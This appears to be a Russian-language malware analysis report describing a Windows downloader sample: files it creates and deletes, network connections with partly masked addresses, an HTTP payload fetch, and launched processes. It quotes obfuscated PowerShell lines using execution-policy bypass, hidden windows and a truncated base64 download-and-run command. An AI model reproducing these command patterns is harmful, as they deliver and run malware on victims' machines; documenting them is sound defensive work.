Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tg_2jpvg.0.cs
- %TEMP%\tg_2jpvg.cmdline
- %TEMP%\tg_2jpvg.out
- %TEMP%\cscddb1.tmp
- %TEMP%\resddd1.tmp
- %TEMP%\tg_2jpvg.dll
- %APPDATA%\seemybestnetworkwhichgivebestthingsentirelifewith.vbs
Удаляет следующие файлы
- %TEMP%\resddd1.tmp
- %TEMP%\cscddb1.tmp
- %TEMP%\tg_2jpvg.pdb
- %TEMP%\tg_2jpvg.dll
- %TEMP%\tg_2jpvg.out
- %TEMP%\tg_2jpvg.0.cs
- %TEMP%\tg_2jpvg.cmdline
Сетевая активность
Подключается к
- '10#.#72.44.178':80
- '10##.#ilemail.com':443
TCP
Запросы HTTP GET
- http://10#.#72.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF
Другие
- '10##.#ilemail.com':443
UDP
- DNS ASK 10##.#ilemail.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "pOWersheLL -Ex BYPaSs -nop -W 1 ... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\tg_2jpvg.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDDD1.tmp" "%TEMP%\CSCDDB1.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtV... (со скрытым окном)
